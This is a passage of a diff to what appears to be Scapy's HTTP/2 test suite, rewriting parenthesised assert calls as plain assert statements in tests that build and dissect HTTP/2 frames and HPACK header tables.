h2.H2Frame(b'\x00\x00$\x04\x00\x00\x00\x00\x00\x00\x01\x07[\xcd\x15\x00\x02\x00\x00\x00\x01\x00\x03\x00\x00\x00{\x00\x04\x00\x12\xd6\x87\x00\x05\x00\x01\xe2@\x00\x06\x00\x00\x00{') #Settings frame -assert(pkt.type == 4) -assert(pkt.len == 36) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(isinstance(pkt.payload, h2.H2SettingsFrame)) -assert(pkt[h2.H2SettingsFrame]) +assert pkt.type == 4 +assert pkt.len == 36 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert isinstance(pkt.payload, h2.H2SettingsFrame) +assert pkt[h2.H2SettingsFrame] sf = pkt[h2.H2SettingsFrame] -assert(len(sf.settings) == 6) -assert(isinstance(sf.settings[0], h2.H2Setting)) -assert(sf.settings[0].id == 1) -assert(sf.settings[0].value == 123456789) -assert(isinstance(sf.settings[1], h2.H2Setting)) -assert(sf.settings[1].id == 2) -assert(sf.settings[1].value == 1) -assert(isinstance(sf.settings[2], h2.H2Setting)) -assert(sf.settings[2].id == 3) -assert(sf.settings[2].value == 123) -assert(isinstance(sf.settings[3], h2.H2Setting)) -assert(sf.settings[3].id == 4) -assert(sf.settings[3].value == 1234567) -assert(isinstance(sf.settings[4], h2.H2Setting)) -assert(sf.settings[4].id == 5) -assert(sf.settings[4].value == 123456) -assert(isinstance(sf.settings[5], h2.H2Setting)) -assert(sf.settings[5].id == 6) -assert(sf.settings[5].value == 123) -assert(isinstance(sf.payload, scapy.packet.NoPayload)) +assert len(sf.settings) == 6 +assert isinstance(sf.settings[0], h2.H2Setting) +assert sf.settings[0].id == 1 +assert sf.settings[0].value == 123456789 +assert isinstance(sf.settings[1], h2.H2Setting) +assert sf.settings[1].id == 2 +assert sf.settings[1].value == 1 +assert isinstance(sf.settings[2], h2.H2Setting) +assert sf.settings[2].id == 3 +assert sf.settings[2].value == 123 +assert isinstance(sf.settings[3], h2.H2Setting) +assert sf.settings[3].id == 4 +assert sf.settings[3].value == 1234567 +assert isinstance(sf.settings[4], h2.H2Setting) +assert sf.settings[4].id == 5 +assert sf.settings[4].value == 123456 +assert isinstance(sf.settings[5], h2.H2Setting) +assert sf.settings[5].id == 6 +assert sf.settings[5].value == 123 +assert isinstance(sf.payload, scapy.packet.NoPayload) = HTTP/2 Build Settings Frame: Settings Frame ~ http2 frame build settings @@ -1054,32 +1054,32 @@ p = h2.H2Frame()/h2.H2SettingsFrame(settings=[ h2.H2Setting(id='Max header list size', value=123) ] ) -assert(raw(p) == b'\x00\x00$\x04\x00\x00\x00\x00\x00\x00\x01\x07[\xcd\x15\x00\x02\x00\x00\x00\x01\x00\x03\x00\x00\x00{\x00\x04\x00\x12\xd6\x87\x00\x05\x00\x01\xe2@\x00\x06\x00\x00\x00{') +assert raw(p) == b'\x00\x00$\x04\x00\x00\x00\x00\x00\x00\x01\x07[\xcd\x15\x00\x02\x00\x00\x00\x01\x00\x03\x00\x00\x00{\x00\x04\x00\x12\xd6\x87\x00\x05\x00\x01\xe2@\x00\x06\x00\x00\x00{' = HTTP/2 Dissect Settings Frame: Incomplete Settings Frame ~ http2 frame dissect settings #We use here the decode('hex') method because null-bytes are rejected by eval() -assert(expect_exception(AssertionError, 'h2.H2Frame(bytes_hex("0000240400000000000001075bcd1500020000000100030000007b00040012d68700050001e2400006000000"))')) +assert expect_exception(AssertionError, 'h2.H2Frame(bytes_hex("0000240400000000000001075bcd1500020000000100030000007b00040012d68700050001e2400006000000"))') = HTTP/2 Dissect Settings Frame: Settings Frame acknowledgement ~ http2 frame dissect settings pkt = h2.H2Frame(b'\x00\x00\x00\x04\x01\x00\x00\x00\x00') #Settings frame w/ ack flag -assert(pkt.type == 4) -assert(pkt.len == 0) -assert(len(pkt.flags) == 1) -assert('A' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(isinstance(pkt.payload, scapy.packet.NoPayload)) +assert pkt.type == 4 +assert pkt.len == 0 +assert len(pkt.flags) == 1 +assert 'A' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert isinstance(pkt.payload, scapy.packet.NoPayload) = HTTP/2 Build Settings Frame: Settings Frame acknowledgement ~ http2 frame build settings p = h2.H2Frame(type=h2.H2SettingsFrame.type_id, flags={'A'}) -assert(raw(p) == b'\x00\x00\x00\x04\x01\x00\x00\x00\x00') +assert raw(p) == b'\x00\x00\x00\x04\x01\x00\x00\x00\x00' + HTTP/2 Push Promise Frame Test Suite @@ -1087,30 +1087,30 @@ assert(raw(p) == b'\x00\x00\x00\x04\x01\x00\x00\x00\x00') ~ http2 frame dissect pushpromise pkt = h2.H2Frame(b'\x00\x00\x15\x05\x00\x00\x00\x00\x01\x00\x00\x00\x03@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me') -assert(pkt.type == 5) -assert(pkt.len == 21) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2PushPromiseFrame)) -assert(pkt[h2.H2PushPromiseFrame]) +assert pkt.type == 5 +assert pkt.len == 21 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2PushPromiseFrame) +assert pkt[h2.H2PushPromiseFrame] pf = pkt[h2.H2PushPromiseFrame] -assert(pf.reserved == 0) -assert(pf.stream_id == 3) -assert(len(pf.hdrs) == 1) -assert(isinstance(pf.payload, scapy.packet.NoPayload)) +assert pf.reserved == 0 +assert pf.stream_id == 3 +assert len(pf.hdrs) == 1 +assert isinstance(pf.payload, scapy.packet.NoPayload) hdr = pf.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.type == 1) -assert(hdr.hdr_name.len == 12) -assert(hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.type == 0) -assert(hdr.hdr_value.len == 2) -assert(hdr.hdr_value.getfieldval('data').origin() == 'Me') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.type == 1 +assert hdr.hdr_name.len == 12 +assert hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.type == 0 +assert hdr.hdr_value.len == 2 +assert hdr.hdr_value.getfieldval('data').origin() == 'Me' = HTTP/2 Build Push Promise Frame: no flag & headers with compression and hdr_name ~ http2 frame build pushpromise @@ -1121,39 +1121,39 @@ p = h2.H2Frame(stream_id=1)/h2.H2PushPromiseFrame(stream_id=3,hdrs=[ hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString('Me')), ) ]) -assert(raw(p) == b'\x00\x00\x15\x05\x00\x00\x00\x00\x01\x00\x00\x00\x03@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me') +assert raw(p) == b'\x00\x00\x15\x05\x00\x00\x00\x00\x01\x00\x00\x00\x03@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me' = HTTP/2 Dissect Push Promise Frame: with padding, the flag END_Header & headers with compression and hdr_name ~ http2 frame dissect pushpromise pkt = h2.H2Frame(b'\x00\x00\x1e\x05\x0c\x00\x00\x00\x01\x08\x00\x00\x00\x03@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me\x00\x00\x00\x00\x00\x00\x00\x00') -assert(pkt.type == 5) -assert(pkt.len == 30) -assert(len(pkt.flags) == 2) -assert('P' in pkt.flags) -assert('EH' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(isinstance(pkt.payload, h2.H2PaddedPushPromiseFrame)) -assert(pkt[h2.H2PaddedPushPromiseFrame]) +assert pkt.type == 5 +assert pkt.len == 30 +assert len(pkt.flags) == 2 +assert 'P' in pkt.flags +assert 'EH' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert isinstance(pkt.payload, h2.H2PaddedPushPromiseFrame) +assert pkt[h2.H2PaddedPushPromiseFrame] pf = pkt[h2.H2PaddedPushPromiseFrame] -assert(pf.padlen == 8) -assert(pf.padding == b'\x00'*8) -assert(pf.stream_id == 3) -assert(len(pf.hdrs) == 1) +assert pf.padlen == 8 +assert pf.padding == b'\x00'*8 +assert pf.stream_id == 3 +assert len(pf.hdrs) == 1 hdr = pf.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.type == 1) -assert(hdr.hdr_name.len == 12) -assert(hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.type == 0) -assert(hdr.hdr_value.len == 2) -assert(hdr.hdr_value.getfieldval('data').origin() == 'Me') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.type == 1 +assert hdr.hdr_name.len == 12 +assert hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.type == 0 +assert hdr.hdr_value.len == 2 +assert hdr.hdr_value.getfieldval('data').origin() == 'Me' = HTTP/2 Build Push Promise Frame: with padding, the flag END_Header & headers with compression and hdr_name ~ http2 frame build pushpromise @@ -1168,7 +1168,7 @@ p = h2.H2Frame(flags={'P', 'EH'}, stream_id=1)/h2.H2PaddedPushPromiseFrame( ], padding=b'\x00'*8 ) -assert(raw(p) == b'\x00\x00\x1e\x05\x0c\x00\x00\x00\x01\x08\x00\x00\x00\x03@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me\x00\x00\x00\x00\x00\x00\x00\x00') +assert raw(p) == b'\x00\x00\x1e\x05\x0c\x00\x00\x00\x01\x08\x00\x00\x00\x03@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me\x00\x00\x00\x00\x00\x00\x00\x00' + HTTP/2 Ping Frame Test Suite @@ -1176,45 +1176,45 @@ assert(raw(p) == b'\x00\x00\x1e\x05\x0c\x00\x00\x00\x01\x08\x00\x00\x00\x03@\x8c ~ http2 frame dissect ping pkt = h2.H2Frame(b'\x00\x00\x08\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe2@') #Ping frame with payload -assert(pkt.type == 6) -assert(pkt.len == 8) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(isinstance(pkt.payload, h2.H2PingFrame)) -assert(pkt[h2.H2PingFrame]) +assert pkt.type == 6 +assert pkt.len == 8 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert isinstance(pkt.payload, h2.H2PingFrame) +assert pkt[h2.H2PingFrame] pf = pkt[h2.H2PingFrame] -assert(pf.opaque == 123456) -assert(isinstance(pf.payload, scapy.packet.NoPayload)) +assert pf.opaque == 123456 +assert isinstance(pf.payload, scapy.packet.NoPayload) = HTTP/2 Build Ping Frame: Ping frame ~ http2 frame build ping p = h2.H2Frame()/h2.H2PingFrame(opaque=123456) -assert(raw(p) == b'\x00\x00\x08\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe2@') +assert raw(p) == b'\x00\x00\x08\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe2@' = HTTP/2 Dissect Ping Frame: Pong frame ~ http2 frame dissect ping pkt = h2.H2Frame(b'\x00\x00\x08\x06\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe2@') #Pong frame -assert(pkt.type == 6) -assert(pkt.len == 8) -assert(len(pkt.flags) == 1) -assert('A' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(isinstance(pkt.payload, h2.H2PingFrame)) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(pkt[h2.H2PingFrame]) +assert pkt.type == 6 +assert pkt.len == 8 +assert len(pkt.flags) == 1 +assert 'A' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert isinstance(pkt.payload, h2.H2PingFrame) +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert pkt[h2.H2PingFrame] pf = pkt[h2.H2PingFrame] -assert(pf.opaque == 123456) -assert(isinstance(pf.payload, scapy.packet.NoPayload)) +assert pf.opaque == 123456 +assert isinstance(pf.payload, scapy.packet.NoPayload) = HTTP/2 Dissect Ping Frame: Pong frame ~ http2 frame dissect ping p = h2.H2Frame(flags={'A'})/h2.H2PingFrame(opaque=123456) -assert(raw(p) == b'\x00\x00\x08\x06\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe2@') +assert raw(p) == b'\x00\x00\x08\x06\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe2@' + HTTP/2 Go Away Frame Test Suite @@ -1222,43 +1222,43 @@ assert(raw(p) == b'\x00\x00\x08\x06\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\ ~ http2 frame dissect goaway pkt = h2.H2Frame(b'\x00\x00\x08\x07\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00') #Go Away for no particular reason :) -assert(pkt.type == 7) -assert(pkt.len == 8) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(isinstance(pkt.payload, h2.H2GoAwayFrame)) -assert(pkt[h2.H2GoAwayFrame]) +assert pkt.type == 7 +assert pkt.len == 8 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert isinstance(pkt.payload, h2.H2GoAwayFrame) +assert pkt[h2.H2GoAwayFrame] gf = pkt[h2.H2GoAwayFrame] -assert(gf.reserved == 0) -assert(gf.last_stream_id == 1) -assert(gf.error == 0) -assert(len(gf.additional_data) == 0) -assert(isinstance(gf.payload, scapy.packet.NoPayload)) +assert gf.reserved == 0 +assert gf.last_stream_id == 1 +assert gf.error == 0 +assert len(gf.additional_data) == 0 +assert isinstance(gf.payload, scapy.packet.NoPayload) = HTTP/2 Build Go Away Frame: No error ~ http2 frame build goaway p = h2.H2Frame()/h2.H2GoAwayFrame(last_stream_id=1, error='No error') -assert(raw(p) == b'\x00\x00\x08\x07\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00') +assert raw(p) == b'\x00\x00\x08\x07\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00' = HTTP/2 Dissect Go Away Frame: Arbitrary error with additional data ~ http2 frame dissect goaway pkt = h2.H2Frame(b'\x00\x00\x10\x07\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\xe2@\x00\x00\x00\x00\x00\x00\x00\x00') #Go Away with debug data -assert(pkt.type == 7) -assert(pkt.len == 16) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(isinstance(pkt.payload, h2.H2GoAwayFrame)) -assert(pkt[h2.H2GoAwayFrame]) +assert pkt.type == 7 +assert pkt.len == 16 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert isinstance(pkt.payload, h2.H2GoAwayFrame) +assert pkt[h2.H2GoAwayFrame] gf = pkt[h2.H2GoAwayFrame] -assert(gf.reserved == 0) -assert(gf.last_stream_id == 2) -assert(gf.error == 123456) -assert(gf.additional_data == 8*b'\x00') -assert(isinstance(gf.payload, scapy.packet.NoPayload)) +assert gf.reserved == 0 +assert gf.last_stream_id == 2 +assert gf.error == 123456 +assert gf.additional_data == 8*b'\x00' +assert isinstance(gf.payload, scapy.packet.NoPayload) = HTTP/2 Build Go Away Frame: Arbitrary error with additional data ~ http2 frame build goaway @@ -1268,7 +1268,7 @@ p = h2.H2Frame()/h2.H2GoAwayFrame( error=123456, additional_data=b'\x00'*8 ) -assert(raw(p) == b'\x00\x00\x10\x07\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\xe2@\x00\x00\x00\x00\x00\x00\x00\x00') +assert raw(p) == b'\x00\x00\x10\x07\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\xe2@\x00\x00\x00\x00\x00\x00\x00\x00' + HTTP/2 Window Update Frame Test Suite @@ -1276,45 +1276,45 @@ assert(raw(p) == b'\x00\x00\x10\x07\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\ ~ http2 frame dissect winupdate pkt = h2.H2Frame(b'\x00\x00\x04\x08\x00\x00\x00\x00\x00\x00\x01\xe2@') #Window update with increment for connection -assert(pkt.type == 8) -assert(pkt.len == 4) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 0) -assert(isinstance(pkt.payload, h2.H2WindowUpdateFrame)) -assert(pkt[h2.H2WindowUpdateFrame]) +assert pkt.type == 8 +assert pkt.len == 4 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 0 +assert isinstance(pkt.payload, h2.H2WindowUpdateFrame) +assert pkt[h2.H2WindowUpdateFrame] wf = pkt[h2.H2WindowUpdateFrame] -assert(wf.reserved == 0) -assert(wf.win_size_incr == 123456) -assert(isinstance(wf.payload, scapy.packet.NoPayload)) +assert wf.reserved == 0 +assert wf.win_size_incr == 123456 +assert isinstance(wf.payload, scapy.packet.NoPayload) = HTTP/2 Build Window Update Frame: global ~ http2 frame build winupdate p = h2.H2Frame()/h2.H2WindowUpdateFrame(win_size_incr=123456) -assert(raw(p) == b'\x00\x00\x04\x08\x00\x00\x00\x00\x00\x00\x01\xe2@') +assert raw(p) == b'\x00\x00\x04\x08\x00\x00\x00\x00\x00\x00\x01\xe2@' = HTTP/2 Dissect Window Update Frame: a stream ~ http2 frame dissect winupdate pkt = h2.H2Frame(b'\x00\x00\x04\x08\x00\x00\x00\x00\x01\x00\x01\xe2@') #Window update with increment for a stream -assert(pkt.type == 8) -assert(pkt.len == 4) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2WindowUpdateFrame)) -assert(pkt[h2.H2WindowUpdateFrame]) +assert pkt.type == 8 +assert pkt.len == 4 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2WindowUpdateFrame) +assert pkt[h2.H2WindowUpdateFrame] wf = pkt[h2.H2WindowUpdateFrame] -assert(wf.reserved == 0) -assert(wf.win_size_incr == 123456) -assert(isinstance(wf.payload, scapy.packet.NoPayload)) +assert wf.reserved == 0 +assert wf.win_size_incr == 123456 +assert isinstance(wf.payload, scapy.packet.NoPayload) = HTTP/2 Build Window Update Frame: a stream ~ http2 frame build winupdate p = h2.H2Frame(stream_id=1)/h2.H2WindowUpdateFrame(win_size_incr=123456) -assert(raw(p) == b'\x00\x00\x04\x08\x00\x00\x00\x00\x01\x00\x01\xe2@') +assert raw(p) == b'\x00\x00\x04\x08\x00\x00\x00\x00\x01\x00\x01\xe2@' + HTTP/2 Continuation Frame Test Suite @@ -1322,28 +1322,28 @@ assert(raw(p) == b'\x00\x00\x04\x08\x00\x00\x00\x00\x01\x00\x01\xe2@') ~ http2 frame dissect continuation pkt = h2.H2Frame(b'\x00\x00\x11\t\x00\x00\x00\x00\x01@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me') -assert(pkt.type == 9) -assert(pkt.len == 17) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2ContinuationFrame)) -assert(pkt[h2.H2ContinuationFrame]) +assert pkt.type == 9 +assert pkt.len == 17 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2ContinuationFrame) +assert pkt[h2.H2ContinuationFrame] hf = pkt[h2.H2ContinuationFrame] -assert(len(hf.hdrs) == 1) -assert(isinstance(hf.payload, scapy.packet.NoPayload)) +assert len(hf.hdrs) == 1 +assert isinstance(hf.payload, scapy.packet.NoPayload) hdr = hf.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.type == 1) -assert(hdr.hdr_name.len == 12) -assert(hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.type == 0) -assert(hdr.hdr_value.len == 2) -assert(hdr.hdr_value.getfieldval('data').origin() == 'Me') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.type == 1 +assert hdr.hdr_name.len == 12 +assert hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.type == 0 +assert hdr.hdr_value.len == 2 +assert hdr.hdr_value.getfieldval('data').origin() == 'Me' = HTTP/2 Build Continuation Frame: no flag & headers with compression and hdr_name ~ http2 frame build continuation @@ -1356,37 +1356,37 @@ p = h2.H2Frame(stream_id=1)/h2.H2ContinuationFrame( ) ] ) -assert(raw(p) == b'\x00\x00\x11\t\x00\x00\x00\x00\x01@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me') +assert raw(p) == b'\x00\x00\x11\t\x00\x00\x00\x00\x01@\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me' = HTTP/2 Dissect Continuation Frame: flag END_Header & headers with compression, sensitive flag and hdr_name ~ http2 frame dissect continuation pkt = h2.H2Frame(b'\x00\x00\x11\t\x04\x00\x00\x00\x01\x10\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me') -assert(pkt.type == 9) -assert(pkt.len == 17) -assert(len(pkt.flags) == 1) -assert('EH' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(isinstance(pkt.payload, h2.H2ContinuationFrame)) -assert(pkt[h2.H2ContinuationFrame]) +assert pkt.type == 9 +assert pkt.len == 17 +assert len(pkt.flags) == 1 +assert 'EH' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert isinstance(pkt.payload, h2.H2ContinuationFrame) +assert pkt[h2.H2ContinuationFrame] hf = pkt[h2.H2ContinuationFrame] -assert(len(hf.hdrs) == 1) -assert(isinstance(hf.payload, scapy.packet.NoPayload)) +assert len(hf.hdrs) == 1 +assert isinstance(hf.payload, scapy.packet.NoPayload) hdr = hf.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.type == 1) -assert(hdr.hdr_name.len == 12) -assert(hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.type == 0) -assert(hdr.hdr_value.len == 2) -assert(hdr.hdr_value.getfieldval('data').origin() == 'Me') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.type == 1 +assert hdr.hdr_name.len == 12 +assert hdr.hdr_name.getfieldval('data').origin() == 'X-Requested-With' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.type == 0 +assert hdr.hdr_value.len == 2 +assert hdr.hdr_value.getfieldval('data').origin() == 'Me' = HTTP/2 Build Continuation Frame: flag END_Header & headers with compression, sensitive flag and hdr_name ~ http2 frame build continuation @@ -1400,7 +1400,7 @@ p = h2.H2Frame(flags={'EH'}, stream_id=1)/h2.H2ContinuationFrame( ) ] ) -assert(raw(p) == b'\x00\x00\x11\t\x04\x00\x00\x00\x01\x10\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me') +assert raw(p) == b'\x00\x00\x11\t\x04\x00\x00\x00\x01\x10\x8c\xfc[i{ZT$\xb2-\xc8\xc9\x9f\x02Me' + HTTP/2 HPackHdrTable Test Suite @@ -1410,33 +1410,33 @@ assert(raw(p) == b'\x00\x00\x11\t\x04\x00\x00\x00\x01\x10\x8c\xfc[i{ZT$\xb2-\xc8 n = 'X-Requested-With' v = 'Me' h = h2.HPackHdrEntry(n, v) -assert(len(h) == 32 + len(n) + len(v)) -assert(h.name() == n.lower()) -assert(h.value() == v) -assert(str(h) == '{}: {}'.format(n.lower(), v)) +assert len(h) == 32 + len(n) + len(v) +assert h.name() == n.lower() +assert h.value() == v +assert str(h) == '{}: {}'.format(n.lower(), v) n = ':status' v = '200' h = h2.HPackHdrEntry(n, v) -assert(len(h) == 32 + len(n) + len(v)) -assert(h.name() == n.lower()) -assert(h.value() == v) -assert(str(h) == '{} {}'.format(n.lower(), v)) +assert len(h) == 32 + len(n) + len(v) +assert h.name() == n.lower() +assert h.value() == v +assert str(h) == '{} {}'.format(n.lower(), v) = HTTP/2 HPackHdrTable : Querying Static Entries ~ http2 hpack hpackhdrtable # In RFC7541, the table is 1-based -assert(expect_exception(KeyError, 'h2.HPackHdrTable()[0]')) +assert expect_exception(KeyError, 'h2.HPackHdrTable()[0]') h = h2.HPackHdrTable() -assert(h[1].name() == ':authority') -assert(h[7].name() == ':scheme') -assert(h[7].value() == 'https') -assert(str(h[14]) == ':status 500') -assert(str(h[16]) == 'accept-encoding: gzip, deflate') +assert h[1].name() == ':authority' +assert h[7].name() == ':scheme' +assert h[7].value() == 'https' +assert str(h[14]) == ':status 500' +assert str(h[16]) == 'accept-encoding: gzip, deflate' -assert(expect_exception(KeyError, 'h2.HPackHdrTable()[h2.HPackHdrTable._static_entries_last_idx+1]')) +assert expect_exception(KeyError, 'h2.HPackHdrTable()[h2.HPackHdrTable._static_entries_last_idx+1]') = HTTP/2 HPackHdrTable : Addind Dynamic Entries without overflowing the table ~ http2 hpack hpackhdrtable @@ -1489,16 +1489,16 @@ hdr3 = h2.HPackLitHdrFldWithIncrIndexing( ) tbl.register(hdr3) -assert(tbl.get_idx_by_name('x-requested-by') == h2.HPackHdrTable._static_entries_last_idx+1) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+3].value() == hdrv) +assert tbl.get_idx_by_name('x-requested-by') == h2.HPackHdrTable._static_entries_last_idx+1 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+3].value() == hdrv = HTTP/2 HPackHdrTable : Addind already registered Dynamic Entries without overflowing the table ~ http2 hpack hpackhdrtable tbl = h2.HPackHdrTable(dynamic_table_max_size=1<<32, dynamic_table_cap_size=1<<32) -assert(len(tbl) == 0) +assert len(tbl) == 0 hdrv = 'PHPSESSID=abcdef0123456789' hdr = h2.HPackLitHdrFldWithIncrIndexing( @@ -1506,7 +1506,7 @@ hdr = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv)) ) tbl.register(hdr) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv hdr2v = 'JSESSID=abcdef0123456789' hdr2 = h2.HPackLitHdrFldWithIncrIndexing( @@ -1514,13 +1514,13 @@ hdr2 = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdr2v)) ) tbl.register(hdr2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdr2v) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdr2v l = len(tbl) tbl.register(hdr) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdr2v) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+3].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdr2v +assert tbl[h2.HPackHdrTable._static_entries_last_idx+3].value() == hdrv = HTTP/2 HPackHdrTable : Addind Dynamic Entries and overflowing the table ~ http2 hpack hpackhdrtable @@ -1532,8 +1532,8 @@ hdr = 